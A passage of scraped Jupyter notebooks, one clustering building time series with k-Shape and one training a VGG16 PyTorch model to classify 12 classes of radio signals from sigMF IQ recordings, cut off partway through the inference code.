text
stringlengths
2.5k
6.39M
kind
stringclasses
3 values
# Experiment 1: k-Shape on Raw Time Series ## Select context csv to work with (see above) ``` import pandas as pd df_weekday = pd.read_csv('data/weekdayContext.csv') print(df_weekday) # in this notebook we use Week Day Context ``` ## Download k-Shape library First from: https://github.com/Mic92/kshape ``` from kshape.core import kshape, zscore ``` Also from: https://tslearn.readthedocs.io/en/latest/auto_examples/plot_kshape.html# ``` import numpy as np import matplotlib.pyplot as plt import matplotlib.cm as cm import plotly.plotly as py from scipy.spatial.distance import cdist from collections import Counter from tslearn.preprocessing import TimeSeriesScalerMeanVariance from tslearn.utils import to_time_series_dataset from tslearn.clustering import KShape from sklearn.metrics import silhouette_samples, silhouette_score from sklearn.metrics.pairwise import pairwise_distances from yellowbrick.cluster import SilhouetteVisualizer from yellowbrick.cluster import KElbowVisualizer """ Function to calculate average and sample silhouette score of dataset X for each cluster in rangeK. Additionally, a plot of each cluster with their instances sorted by their silhouette score, in descending order, with a dashed red line of overall average. """ def plotSilhouettes(X, rangeK, seed, max_iter): for k in rangeK: fig = plt.figure(figsize=(18,8)) ax = fig.add_subplot(1, 1, 1) # The (k+1)*10 is for inserting blank space between silhouette # plots of individual clusters, to demarcate them clearly. ax.set_ylim([0, len(X) + (k + 1) * 10]) # Initialize the clusterer with n_clusters value and a random generator # seed for reproducibility. sz = X.shape[1] ks_clusterer = KShape(n_clusters=k, verbose=True, random_state=seed, max_iter=max_iter) cluster_labels = ks_clusterer.fit_predict(X) # The silhouette_score gives the average value for all the samples. 
# This gives a perspective into the density and separation of the formed # clusters silhouette_avg = silhouette_score(X, cluster_labels) print("For k = {}. The average silhouette_score is : {}.".format(k, silhouette_avg)) # Compute the silhouette scores for each sample sample_silhouette_values = silhouette_samples(X, cluster_labels) y_lower = 10 for i in range(k): # Aggregate the silhouette scores for samples belonging to # cluster i, and sort them ith_cluster_silhouette_values = sample_silhouette_values[cluster_labels == i] ith_cluster_silhouette_values.sort() size_cluster_i = ith_cluster_silhouette_values.shape[0] y_upper = y_lower + size_cluster_i color = cm.nipy_spectral(float(i) / k) ax.fill_betweenx(np.arange(y_lower, y_upper), 0, ith_cluster_silhouette_values, facecolor=color, edgecolor=color, alpha=0.7) # Label the silhouette plots with their cluster numbers at the middle ax.text(-0.05, y_lower + 0.5 * size_cluster_i, str(i), fontsize = 20) # Compute the new y_lower for next plot y_lower = y_upper + 10 # 10 for the 0 samples ax.set_xlabel("Silhouette Coefficient Values", fontsize = 20) ax.set_ylabel("Cluster Label", fontsize = 20) # The vertical line for average silhouette score of all the values ax.axvline(x=silhouette_avg, color="red", linestyle="--") ax.set_yticks([]) # Clear the yaxis labels/ticks plt.suptitle(("Silhouette Analysis for KMeans clustering " "with num. clusters = %d" % k), fontsize=19, fontweight='bold') # plot all genereated figures plt.show() ``` ## Run k-Shape algorithm Observations from the github repo: - If the data is available from different sources with same frequency but at different points in time, it needs to be aligned. 
- kshape also expect no time series with a constant observation value or 'N/A' Distance measure: normalized cross-correlation measure (consider the shape while comparing them) ``` # get rid of building ID df_weekday_noID = df_weekday.copy() del df_weekday_noID['Unnamed: 0'] weekday_X_train = TimeSeriesScalerMeanVariance().fit_transform(np.squeeze(df_weekday_noID.values)) # dataFrame.values will generate a 3d arra (the third dimension being 1) so we convert it to a 2d array weekday_X_train = np.squeeze(weekday_X_train) # now is a 2d array print("Shape of X matrix: {}".format(weekday_X_train.shape)) sz = weekday_X_train.shape[1] seed = 3 max_iter = 500 k = 5 ks = KShape(n_clusters=k, verbose=True, random_state=seed, max_iter=max_iter) y_pred = ks.fit_predict(weekday_X_train) plt.figure(figsize=(18,10)) for yi in range(k): plt.subplot(k, 1, 1 + yi) for xx in weekday_X_train[y_pred == yi]: plt.plot(xx.ravel(), "k-", alpha=.2) plt.plot(ks.cluster_centers_[yi].ravel(), "r-") plt.xlim(0, sz) plt.ylim(-4, 4) plt.title("Cluster %d" % (yi + 1)) # plt.tight_layout() plt.show() ``` ## Evaluation: ### Evaluate resulting clusters with sillouhette coefficient plot ``` rangeK = [2, 3, 4, 5, 6] # values of K-clusters to test seed = 3 # random seed for reproducibility max_iter = 500 plotSilhouettes(weekday_X_train, rangeK, seed, max_iter) # using library for silhouettes (http://www.scikit-yb.org/en/latest/api/cluster/silhouette.html) # Instantiate the clustering model and visualizer model = KShape(n_clusters=5, verbose=True, random_state=seed) visualizer = SilhouetteVisualizer(model) visualizer.fit(weekday_X_train) # Fit the training data to the visualizer visualizer.poof() # Draw/show/poof the data ``` ### Evaluate resulting clusters with elbow method #### distortion metric: mean sum of squared distances to centers ``` # using library (http://www.scikit-yb.org/en/latest/api/cluster/elbow.html) # Instantiate the clustering model and visualizer model = 
KShape(random_state=seed,max_iter=max_iter) visualizer = KElbowVisualizer(model, k=(2,10), metric='distortion') visualizer.fit(weekday_X_train) # Fit the data to the visualizer visualizer.poof() # Draw/show/poof the data ``` #### silhouette: mean ratio of intra-cluster and nearest-cluster distance ``` # using library (http://www.scikit-yb.org/en/latest/api/cluster/elbow.html) # Instantiate the clustering model and visualizer model = KShape(random_state=seed,max_iter=max_iter) visualizer = KElbowVisualizer(model, k=(2,10), metric='silhouette') visualizer.fit(weekday_X_train) # Fit the data to the visualizer visualizer.poof() # Draw/show/poof the data ``` #### calinski_harabaz: ratio of within to between cluster dispersion ``` # using library (http://www.scikit-yb.org/en/latest/api/cluster/elbow.html) # Instantiate the clustering model and visualizer model = KShape(random_state=seed,max_iter=max_iter) visualizer = KElbowVisualizer(model, k=(2,10), metric='calinski_harabaz') visualizer.fit(weekday_X_train) # Fit the data to the visualizer visualizer.poof() # Draw/show/poof the data ```
github_jupyter
## sigMF RF classification; 12 classes ``` import os import torch import torch.nn as nn import torch.optim as optim import torch.nn.functional as F import torch.utils.data import torch.utils.data as data from torch.autograd import Variable import numpy as np import matplotlib.pyplot as plt from scipy import signal import glob import json from os import walk import pickle import json import pathlib import random from timeit import default_timer as timer import time from tqdm import tqdm from torch.utils.data import Dataset, DataLoader global GPU, fft, Fs, center_freq, fft_val, Fs_test, loss, batches, eps, var_noise, mean_noise, top global c1_coeff, c2_coeff, a, r1_c1, r2_c1, r1_c2, r2_c2, compare a = 1 r1_c2 = 1 r2_c2 = 10e1 top = .99 var_noise = 8.78e-09 mean_noise = 1 # not used eps = 1e-15 Fs = 1000000 fft = 1024 center_freq_file = 433.65e6 # when SDR doing 25MSPS with center at 428MHz center_freq_live = 428.00e6 # when SDR doing 25MSPS with center at 428MHz batches = 64 plt.style.use('default') GPU = 0 device = torch.device('cuda:0') print('Torch version =', torch.__version__, 'CUDA version =', torch.version.cuda) print('CUDA Device:', device) print('Is cuda available? =',torch.cuda.is_available()) r2_c2 !. 
/home/david/prefix-3.8/setup_env.sh ``` #### Machine paths ``` path_ram = "/home/david/sigMF_ML/RF/ramdisk/" path_usrp = "/home/david/prefix-3.8/" path = "/home/david/sigMF_ML/RF/RF_class/data/" # ACE path_val1 = "/home/david/sigMF_ML/RF/RF_class/data_val1/" # fft_center - class 9 path_val2 = "/home/david/sigMF_ML/RF/RF_class/data_val2/" # light switch - class 10 path_val3 = "/home/david/sigMF_ML/RF/RF_class/data_val3/" # clickndig - class 5 path_val4 = "/home/david/sigMF_ML/RF/RF_class/data_val4/" # GD55 - class 1 path_val5 = "/home/david/sigMF_ML/RF/RF_class/data_val5/" # lora125 - class 0 path_val6 = "/home/david/sigMF_ML/RF/RF_class/data_val6/" # lora250 - class 7 path_val7 = "/home/david/sigMF_ML/RF/RF_class/data_val7/" # NFM - class 2 path_val8 = "/home/david/sigMF_ML/RF/RF_class/data_val8/" # sado - class 6 path_val9 = "/home/david/sigMF_ML/RF/RF_class/data_val9/" # TYT - class 3 path_val10 = "/home/david/sigMF_ML/RF/RF_class/data_val10/" # vodeson - class 4 path_val11 = "/home/david/sigMF_ML/RF/RF_class/data_val11/" # white noise - class 8 path_val12 = "/home/david/sigMF_ML/RF/RF_class/data_val12/" # ysf - class 11 path_fig = "/home/david/sigMF_ML/RF/RF_class/" # ACE path_val = "/home/david/sigMF_ML/RF/RF_class/testing_data/" # ACE path_save = "/home/david/sigMF_ML/RF/RF_class/saved/" # ACE path_test = "/home/david/sigMF_ML/RF/RF_class/testing_data/" # ACE path_test_1msps = "/home/david/sigMF_ML/RF/RF_class/testing_data_1msps/" # ACE path_test_5msps = "/home/david/sigMF_ML/RF/RF_class/testing_data_5msps/" # ACE path_test_10msps = "/home/david/sigMF_ML/RF/RF_class/testing_data_10msps/" # ACE path_test_25msps = "/home/david/sigMF_ML/RF/RF_class/testing_data_25msps/" # ACE print(path) ``` ## Functions ``` # START OF FUNCTIONS **************************************************** def meta_encoder(meta_list, num_classes): a = np.asarray(meta_list, dtype=int) # print('a = ', a) return a def save_model(epoch,loss): rf_model = 'VGG16_20210309_2D_1e5' PATH = 
path_save+rf_model torch.save({ 'epoch': epoch, 'model_state_dict': model.state_dict(), 'optimizer_state_dict': optimizer.state_dict(), 'loss': loss,}, PATH) def load_model(): rf_model = 'VGG16_v58_20210211_2D_10dB_noise_autosave' PATH = path_save+rf_model device = torch.device("cuda:1") model = resnet50(2, 12) model.load_state_dict(torch.load(PATH)) model.to(device) model.eval() def gpu_test_file(db): if (msps == 1): w1 = fft elif (msps == 5): w1 = fft*1 elif (msps == 10): w1 = fft*1 elif (msps == 25): w1 = fft*1 print('gpu_test file function') I = db[0::2] Q = db[1::2] w = fft*msps print('Sample Rate = ',w,'MSPS') den = 2 print('window length = ', w1) win = torch.hann_window(w1, periodic=True, dtype=None, layout=torch.strided, requires_grad=False).cuda(GPU) I_stft = torch.stft(torch.tensor(I).cuda(GPU), n_fft=fft, hop_length=fft//den, win_length=w1, window=win, center=True, normalized=True, onesided=True) Q_stft = torch.stft(torch.tensor(Q).cuda(GPU), n_fft=fft, hop_length=fft//den, win_length=w1, window=win, center=True, normalized=True, onesided=True) I_mag = torch.abs(torch.sqrt(I_stft[:,:,0]**2+I_stft[:,:,1]**2)) Q_mag = torch.abs(torch.sqrt(Q_stft[:,:,0]**2+Q_stft[:,:,1]**2)) I_mag = torch.unsqueeze(I_mag, dim=2) Q_mag = torch.unsqueeze(Q_mag, dim=2) # print('I shape =', I_stft.shape, 'Q shape = ', Q_stft.shape ) # print('I_mag shape =', I_mag.shape, 'Q_mag shape = ', Q_mag.shape ) Z_stft = torch.cat((I_mag,Q_mag),2) # Z_stft = torch.cat((Z_stft[fft//2:,:,:],Z_stft[:fft//2,:,:])) # NOT SURE I NEED TO DO THIS... 
# print('gpu_test file Z shape =', Z_stft.shape) Z_stft = Z_stft[fft//2:,:,:] # throw bottom 1/2 away print('FINAL gpu_test FILE IQ shape =', Z_stft.shape) torch.cuda.empty_cache() return Z_stft # Returning 2D def gpu_test_live(db,msps): if (msps == 1): w1 = fft elif (msps == 5): w1 = fft*1 elif (msps == 10): w1 = fft*1 elif (msps == 25): w1 = fft*1 print('gpu_test live function') # I = db[0:10000000:2] # Q = db[1:10000000:2] I = db[0::2] Q = db[1::2] print('I length = ', len(I)) print('Q length = ', len(Q)) w = fft*msps print(w,'MSPS') den = 2 win = torch.hann_window(w1, periodic=True, dtype=None, layout=torch.strided, requires_grad=False).cuda(GPU) I_stft = torch.stft(torch.tensor(I).cuda(GPU), n_fft=w, hop_length=w//den, win_length=w1, window=win, center=True, normalized=True, onesided=True) Q_stft = torch.stft(torch.tensor(Q).cuda(GPU), n_fft=w, hop_length=w//den, win_length=w1, window=win, center=True, normalized=True, onesided=True) I_mag = torch.abs(torch.sqrt(I_stft[:,:,0]**2+I_stft[:,:,1]**2)) Q_mag = torch.abs(torch.sqrt(Q_stft[:,:,0]**2+Q_stft[:,:,1]**2)) I_mag = torch.unsqueeze(I_mag, dim=2) Q_mag = torch.unsqueeze(Q_mag, dim=2) Z_stft = torch.cat((I_mag,Q_mag),2) print('gpu_test live IQ shape =', Z_stft.shape) # Z_stft = torch.cat((Z_stft[w//2:,:,:],Z_stft[:w//2,:,:])) # NOT SURE I NEED TO DO THIS... 
Z_stft = Z_stft[:w//2,:,:]# throw bottom 1/2 away print('FINAL gpu_test LIVE IQ shape =', Z_stft.shape) return Z_stft # Returning 2D and plot def iq_read(data_files): # USING GPU to perform STFT print('iq_read function**********') data_IQ_list = [] data_IQ_temp = [] for file in data_files: db = np.fromfile(file, dtype="float32") # stft = gpu(db).detach().cpu().numpy() print('iq_read function') stft, stft_plot = gpu_test_file(db) stft = stft.detach().cpu().numpy() stft_plot = stft_plot.detach().cpu().numpy() stft_plot = 10*np.log10(np.abs(stft_plot+eps)) plt.imshow(stft_plot) plt.pcolormesh(stft_plot) # plt.imshow(stft, aspect='auto', origin='lower') plt.show() data_IQ_temp.append(stft) data_IQ_list = np.array(data_IQ_temp) return data_IQ_list def iq_read_test_file(data_files): # USING GPU to perform STFT data_IQ_list = [] data_IQ_temp = [] print('iq_read_test file') for file in data_files: db = np.fromfile(file, dtype="float32") stft = gpu_test_file(db) stft_plot = 20*np.log10(np.abs(stft[:,:,0].detach().cpu().numpy()+eps)) print('imshow method') plt.imshow(stft_plot, vmin=-70, vmax=5, aspect='auto', origin='lower') plt.show() data_IQ_temp.append(stft.detach().cpu().numpy()) data_IQ_list = np.array(data_IQ_temp) return data_IQ_list def iq_read_test_live(data_files,msps): # USING GPU to perform STFT # iq_cpu_plot(data_files) #checking with cpu complex plotting data_IQ_list = [] data_IQ_temp = [] print('iq_read_test live') for file in data_files: db = np.fromfile(file, dtype="float32") stft = gpu_test_live(db,msps) # ************************************************************************* # stft_plot = 20*np.log10(np.abs(stft[:,:,0].detach().cpu().numpy()+eps)) # print('iq_read_test live imshow method') # plt.imshow(stft_plot, vmin=-70, vmax=5, aspect='auto', origin='lower') # plt.show() # ************************************************************************* data_IQ_temp.append(stft.detach().cpu().numpy()) data_IQ_list = np.array(data_IQ_temp) return 
data_IQ_list def read_meta(meta_files): meta_list = [] for meta in meta_files: all_meta_data = json.load(open(meta)) meta_list.append(all_meta_data['global']["core:class"]) meta_list = list(map(int, meta_list)) return meta_list def read_num_val(x): x = len(meta_list_val) return x #**************************** Print historgram subplots ****************************** def histo_plots(inputs): fig=plt.figure(figsize=(8,8)) ncols = 2 nrows = 2 print('make torch inputs') print('inputs shape for histogram1 = ', inputs.shape) inputs = 10*np.log10(np.abs(inputs.cpu()+eps)) for x in range(4): # print('x = ', x, 'inputs shape for histogram2 = ', inputs[:,:,x].shape) flat_inputs = torch.flatten(inputs[:,:,x], start_dim=0, end_dim=-1).numpy() # print('type = ', type(flat_inputs)) # print('x = ', x, 'flat_input max = ', np.amax(flat_inputs)) # print('inputs are: ', flat_inputs.shape) fig.add_subplot(nrows, ncols, x+1) plt.hist(flat_inputs, bins=5000) plt.gca().set(title='Frequency Histogram', ylabel='Frequency'); plt.xlim(-100, 10) # plt.ylim(0, 40000) return flat_inputs #************************************************************************************* #**************************** Print historgram subplots ****************************** def histo_stats(inputs): # print('make torch inputs') # print('inputs shape for histogram1 = ', inputs.shape) mean = np.zeros(4) std = np.zeros(4) for x in range(4): # print('x = ', x, 'inputs shape for histogram2 = ', inputs[:,:,x].shape) flat_inputs = torch.flatten(inputs[:,:,x], start_dim=0, end_dim=-1).numpy() # print('inputs are: ', flat_inputs.shape) mean[x] = flat_inputs.mean() std[x] = flat_inputs.std() # print('mean = ', mean, 'std = ', std) return mean, std #**************************** Print historgram freq stats ****************************** def histo_stats_freq_file(inputs,msps): mean = inputs.mean() std = inputs.std() print("mean Freq = {0:9,.2f}".format(mean)) print("std Freq = {0:9,.2f}".format(std)) print('length of inputs 
= ', len(inputs)) # plt.hist(inputs, 30, facecolor='blue', align='mid') if (msps==25): plt.hist(inputs, 30, range=[428.0, 440.0], facecolor='blue', align='mid') elif (msps==1): plt.hist(inputs, 30, range=[433.65, 434.15], facecolor='blue', align='mid') elif (msps==5): plt.hist(inputs, 30, range=[433.00, 435.50], facecolor='blue', align='mid') elif (msps==10): plt.hist(inputs, 30, range=[433.00, 438.00], facecolor='blue', align='mid') else: print('WRONG SAMPLE RATE CHOSEN') plt.gca().set(title='Frequency Histogram', ylabel='Frequency'); plt.show() def histo_stats_freq_live(inputs,msps): mean = inputs.mean() std = inputs.std() print("mean Freq = {0:9,.2f}".format(mean)) print("std Freq = {0:9,.2f}".format(std)) print('length of inputs = ', len(inputs)) # plt.hist(inputs, 30, facecolor='blue', align='mid') if (msps==25): plt.hist(inputs, 30, range=[428.0, 440.0], facecolor='blue', align='mid') elif (msps==1): plt.hist(inputs, 30, range=[433.65, 434.15], facecolor='blue', align='mid') elif (msps==5): plt.hist(inputs, 30, range=[433.00, 435.50], facecolor='blue', align='mid') elif (msps==10): plt.hist(inputs, 30, range=[433.00, 438.00], facecolor='blue', align='mid') else: print('WRONG SAMPLE RATE CHOSEN') plt.gca().set(title='Frequency Histogram', ylabel='Frequency'); plt.show() # END OF FUNCTIONS ****************************************************** from functools import partial from dataclasses import dataclass from collections import OrderedDict VGG_types = { 'VGG11': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'], 'VGG13': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'], 'VGG16': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'], 'VGG19': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'], } class VGG_net(nn.Module): def __init__(self, in_channels=2, num_classes=12): super(VGG_net, self).__init__() self.in_channels = in_channels 
self.conv_layers = self.create_conv_layers(VGG_types['VGG16']) self.fcs = nn.Sequential( nn.Linear(512*7*7, 4096), nn.ReLU(), nn.Dropout(p=0.5), nn.Linear(4096, 4096), nn.ReLU(), nn.Dropout(p=0.5), nn.Linear(4096, num_classes) ) def forward(self, x): x = self.conv_layers(x) x = x.reshape(x.shape[0], -1) x = self.fcs(x) return x def create_conv_layers(self, architecture): layers = [] in_channels = self.in_channels for x in architecture: if type(x) == int: out_channels = x layers += [nn.Conv2d(in_channels=in_channels,out_channels=out_channels, kernel_size=(3,3), stride=(1,1), padding=(1,1)), nn.BatchNorm2d(x), nn.ReLU()] in_channels = x elif x == 'M': layers += [nn.MaxPool2d(kernel_size=(2,2), stride=(2,2))] return nn.Sequential(*layers) if __name__ == '__main__': device = 'cuda' if torch.cuda.is_available() else 'cpu' model = VGG_net(in_channels=2,num_classes=12).to(device) print(model) ## N = 3 (Mini batch size) #x = torch.randn(3, 3, 224, 224).to(device) #print(model(x).shape) from torchsummary import summary # model = VGG_net() # summary(model.cuda(), (2, 224, 224)) from torch.utils.data import Dataset class RFDataset(Dataset): def __init__(self, root_path): print(root_path) self.root_path = root_path self.list_of_all_pickles = sorted(pathlib.Path(root_path).rglob('*/chopped-data-224-224/*.pickle')) self.get_class = dict() class_folders = list(pathlib.Path(root_path).glob('*/')) for class_folder in class_folders: class_index = -1 metadata_path = list(class_folder.rglob('*.sigmf-meta'))[0] with open(metadata_path) as fp: metadata = json.load(fp) class_index = int(metadata["global"]["core:class"]) self.get_class[str(class_folder.stem)] = class_index def __len__(self): return len(self.list_of_all_pickles) def __getitem__(self, idx): filepath = self.list_of_all_pickles[idx] with open(filepath, 'rb') as fp: tensor = pickle.load(fp)['bounded'] foldername = filepath.parts[7] label = self.get_class[foldername] #return (tensor, label) # this is a tuple return {'data': 
tensor, 'label': label} ``` #### Evaluation dataset loader ``` rf_dataset1 = RFDataset(path_val1) val1_data = data.DataLoader(rf_dataset1, batch_size=batches, shuffle=True) rf_dataset2 = RFDataset(path_val2) val2_data = data.DataLoader(rf_dataset2, batch_size=batches, shuffle=True) rf_dataset3 = RFDataset(path_val3) val3_data = data.DataLoader(rf_dataset3, batch_size=batches, shuffle=True) rf_dataset4 = RFDataset(path_val4) val4_data = data.DataLoader(rf_dataset4, batch_size=batches, shuffle=True) rf_dataset5 = RFDataset(path_val5) val5_data = data.DataLoader(rf_dataset5, batch_size=batches, shuffle=True) rf_dataset6 = RFDataset(path_val6) val6_data = data.DataLoader(rf_dataset6, batch_size=batches, shuffle=True) rf_dataset7 = RFDataset(path_val7) val7_data = data.DataLoader(rf_dataset7, batch_size=batches, shuffle=True) rf_dataset8 = RFDataset(path_val8) val8_data = data.DataLoader(rf_dataset8, batch_size=batches, shuffle=True) rf_dataset9 = RFDataset(path_val9) val9_data = data.DataLoader(rf_dataset9, batch_size=batches, shuffle=True) rf_dataset10 = RFDataset(path_val10) val10_data = data.DataLoader(rf_dataset10, batch_size=batches, shuffle=True) rf_dataset11 = RFDataset(path_val11) val11_data = data.DataLoader(rf_dataset11, batch_size=batches, shuffle=True) rf_dataset12 = RFDataset(path_val12) val12_data = data.DataLoader(rf_dataset12, batch_size=batches, shuffle=True) ``` #### list of loaders ``` val_data_list = [val1_data] val_data_list.append(val2_data) val_data_list.append(val3_data) val_data_list.append(val4_data) val_data_list.append(val5_data) val_data_list.append(val6_data) val_data_list.append(val7_data) val_data_list.append(val8_data) val_data_list.append(val9_data) val_data_list.append(val10_data) val_data_list.append(val11_data) val_data_list.append(val12_data) print('done') ``` ## Training ``` def train_net(total): test_patch_total = 24000 # 120000 compare = .7 loss_plot = np.zeros(total) total_plot = np.zeros(total//5+1) batch_plot = 
np.zeros(len(training_data)*total//100) batch_indexer = 0 for epoch in tqdm(range(total), desc="Epoch"): model.train() start = timer() for i, rf_data in enumerate(training_data, 0): inputs = rf_data['data'] inputs = torch.squeeze(inputs, dim=1) # print('input1 = ', inputs.shape) inputs = inputs.permute(0,3,1,2).contiguous() # print('input before noise add = ', inputs.shape) batch_dim, b, c, d = inputs.shape # add som noise c2 = torch.FloatTensor(a).uniform_(r1_c2, r2_c2) inputs = inputs + torch.abs((((var_noise*c2)**0.5)*torch.randn(batch_dim, 4, 224, 224)*1)) #**************** take I and Q magnitudue only *********** I_temp = torch.abs(torch.sqrt(inputs[:,0,:,:]**2+inputs[:,1,:,:]**2)) I_temp = torch.unsqueeze(I_temp, dim=1) Q_temp = torch.abs(torch.sqrt(inputs[:,2,:,:]**2+inputs[:,3,:,:]**2)) Q_temp = torch.unsqueeze(Q_temp, dim=1) inputs = torch.cat((I_temp,Q_temp),1) # print('inputs after noise add = ', inputs.shape) #********************************************************* # batch_dim, b, c, d = inputs.shape # # add som noise # c2 = torch.FloatTensor(a).uniform_(r1_c2, r2_c2) # inputs = inputs + torch.abs((((var_noise*c2)**0.5)*torch.randn(batch_dim, 2, 224, 224)*1)) inputs = Variable(inputs.cuda(GPU)) labels = rf_data['label'] labels = labels.cuda(GPU) outputs = model(inputs) loss = criterion(outputs, labels) optimizer.zero_grad() loss.backward() optimizer.step() end = timer() batch_time = end - start #*************************************************************************************** print('batch time = ', batch_time) print('************************* start *************************') total_correct_patches = grand_total = 0 start_test = timer() model.eval() for testing in val_data_list: t = train_val(testing) total_correct_patches = total_correct_patches + t grand_total = total_correct_patches/test_patch_total batch_plot[batch_indexer] = grand_total*100 batch_indexer = batch_indexer + 1 # print('Batch number = ', i, 'of', len(training_data)) print('Total 
% correct {:.2f}%'.format(grand_total*100)) model.train end_test = timer() test_time = end_test - start_test print('test time = ', test_time) print('*************************** end ***************************') #**************************************************************************************** save_model(epoch,loss) tqdm.write('___________________________________________') tqdm.write("Epoch {} Loss {:.10f} ".format(epoch+1, loss.data*1)) tqdm.write('___________________________________________') return loss_plot, batch_plot ``` #### Training Evaluation ``` def train_val(val_data): with torch.no_grad(): total = noise = center_fft = target_to_int = accumulated_corrects = percent_correct = 0 c0 = c1 = c2 = c3 = c4 = c5 = c6 = c7 = c8 = c9 = 0 for i, rf_data in enumerate(val_data, 0): inputs = rf_data['data'] inputs = torch.squeeze(inputs, dim=1) inputs = inputs.permute(0,3,1,2).contiguous() batch_dim, b, c, d = inputs.shape # add som noise c2 = torch.FloatTensor(a).uniform_(r1_c2, r2_c2) inputs = inputs + torch.abs((((var_noise*c2)**0.5)*torch.randn(batch_dim, 4, 224, 224)*1)) #**************** take I and Q magnitudue only *********** I_temp = torch.abs(torch.sqrt(inputs[:,0,:,:]**2+inputs[:,1,:,:]**2)) I_temp = torch.unsqueeze(I_temp, dim=1) Q_temp = torch.abs(torch.sqrt(inputs[:,2,:,:]**2+inputs[:,3,:,:]**2)) Q_temp = torch.unsqueeze(Q_temp, dim=1) inputs = torch.cat((I_temp,Q_temp),1) #********************************************************* # batch_dim, b, c, d = inputs.shape # # add som noise # c2 = torch.FloatTensor(a).uniform_(r1_c2, r2_c2) # inputs = inputs + torch.abs((((var_noise*c2)**0.5)*torch.randn(batch_dim, 2, 224, 224)*1)) inputs = Variable(inputs.cuda(GPU)) labels = rf_data['label'] labels = labels.cuda(GPU) optimizer.zero_grad() outputs = model(inputs) _, predicted = torch.max(outputs.data, 1) for b in range(len(predicted)): labels_temp = labels[b].detach().cpu().numpy() temp = predicted[b].detach().cpu().numpy() if (labels_temp==temp): 
accumulated_corrects = accumulated_corrects+1 torch.cuda.empty_cache() return accumulated_corrects ``` ## Inference Segmented Dataloader ``` # Inference Dataloader with labels class inference_dataloader_segmented_live(data.Dataset): def __init__(self): self.dataPath = path self.num_classes = 12 self.num_examples = 1 # use only 1 for semi-live inferencing def __getitem__(self, index): sigmf_data = np.array(data_IQ_list_val[index]) print('sigmf_data = ', sigmf_data.shape) frequency, time, dims1 = sigmf_data.shape print('frequency = ', frequency, ' time = ', time) data_IQ = [] data_IQ_temp2 = [] seg_t = 224 seg_f = 224 seg_time = time//seg_t seg_freq = frequency//seg_f print('seg_time = ', seg_time, 'seg_freq = ', seg_freq) # Segment the time axis for j in range(seg_time): # Segment the frequency axis for k in range(seg_freq): IQ = sigmf_data[seg_f*k:(seg_f)+seg_f*k,seg_t*j:(seg_t)+seg_t*j] data_IQ_temp2.append(IQ) data_IQ = np.array(data_IQ_temp2) print('data_IQ shape = ', data_IQ.shape) loop_counter, dim1, dim2, dim3 = data_IQ.shape TRUTH = meta_encoder(meta_list_val, self.num_classes) TRUTH = TRUTH.astype(np.float32) return torch.from_numpy(data_IQ),torch.from_numpy(TRUTH), loop_counter, seg_freq def __len__(self): return self.num_examples # Inference Dataloader with labels class inference_dataloader_segmented(data.Dataset): def __init__(self): self.dataPath = path self.num_classes = 12 self.num_examples = 1 def __getitem__(self, index): sigmf_data = np.array(data_IQ_list_val[index]) print('sigmf_data = ', sigmf_data.shape) frequency, time, dims1 = sigmf_data.shape print('frequency = ', frequency, ' time = ', time) data_IQ = [] data_IQ_temp2 = [] seg_t = 224 seg_f = 224 seg_time = time//seg_t seg_freq = frequency//seg_f print('seg_time = ', seg_time, 'seg_freq = ', seg_freq) # Segment the time axis for j in range(seg_time): # Segment the frequency axis for k in range(seg_freq): IQ = sigmf_data[seg_f*k:(seg_f)+seg_f*k,seg_t*j:(seg_t)+seg_t*j] 
data_IQ_temp2.append(IQ) data_IQ = np.array(data_IQ_temp2) print('data_IQ shape = ', data_IQ.shape) loop_counter, dim1, dim2, dim3 = data_IQ.shape TRUTH = meta_encoder(meta_list_val, self.num_classes) TRUTH = TRUTH.astype(np.float32) return torch.from_numpy(data_IQ),torch.from_numpy(TRUTH), loop_counter, seg_freq def __len__(self): return self.num_examples ``` ### validation functions ``` def validation_read(): # Inference DATA READING ************************************************ # read in validation IQ and meta data os.chdir(path_val) data_files_validation = sorted(glob.glob('*.sigmf-data')) meta_files_validation = sorted(glob.glob('*.sigmf-meta')) for meta in meta_files_validation: all_meta_data = json.load(open(meta)) print("validation file name = ", meta) # Load validation sigmf-data files meta_list_val = read_meta(meta_files_validation) data_IQ_list_val = iq_read(data_files_validation) return data_IQ_list_val, meta_list_val def testing_read(): print('testing_read function') # Inference DATA READING ************************************************ # read in validation IQ and meta data os.chdir(path_val) data_files_validation = sorted(glob.glob('*.sigmf-data')) meta_files_validation = sorted(glob.glob('*.sigmf-meta')) for meta in meta_files_validation: all_meta_data = json.load(open(meta)) print("testing file name = ", meta) meta_list_val = read_meta(meta_files_validation) data_IQ_list_val = iq_read_test_file(data_files_validation) return data_IQ_list_val, meta_list_val ``` #### Changed to get test data from different directory ``` def inference_read(msps): # Inference DATA READING ************************************************ # read in validation IQ and meta data os.chdir(path_ram) data_files_validation = sorted(glob.glob('*.sigmf-data')) meta_files_validation = sorted(glob.glob('*.sigmf-meta')) for meta in meta_files_validation: all_meta_data = json.load(open(meta)) print("inference file name = ", meta) # Load validation sigmf-data files meta_list_val = 
read_meta(meta_files_validation) data_IQ_list_val = iq_read_test_live(data_files_validation,msps) return data_IQ_list_val, meta_list_val def inference_read_file(msps,path): # Inference DATA READING ************************************************ # read in validation IQ and meta data os.chdir(path) data_files_validation = sorted(glob.glob('*.sigmf-data')) meta_files_validation = sorted(glob.glob('*.sigmf-meta')) for meta in meta_files_validation: all_meta_data = json.load(open(meta)) print("inference file name = ", meta) # Load validation sigmf-data files meta_list_val = read_meta(meta_files_validation) data_IQ_list_val = iq_read_test_live(data_files_validation,msps) return data_IQ_list_val, meta_list_val # inference ************************************************************ def testing_file(msps): large_width = 400 np.set_printoptions(precision=2,floatmode='fixed', linewidth=large_width) model.eval() V = data.DataLoader(inference_dataloader_segmented(), batch_size=1) start_frequency = (center_freq_file) match_freq = start_frequency print('start_frequency = ', start_frequency/1000000) freq_offset = 0 total = noise = center_fft = target_to_int = accumulated_corrects = percent_correct = 0 c0 = c1 = c2 = c3 = c4 = c5 = c6 = c7 = c8 = c9 = 0 # total = 68 with torch.no_grad(): for i, rf_data in enumerate(V, 0): accumulated_corrects = 0 percent_correct = 0 target_to_int = 0 inputs, target, counter, seg_freq = rf_data print('testing counter = ', counter, 'seg_freq =', seg_freq) #**************************** Print segmented pics *********************************** # 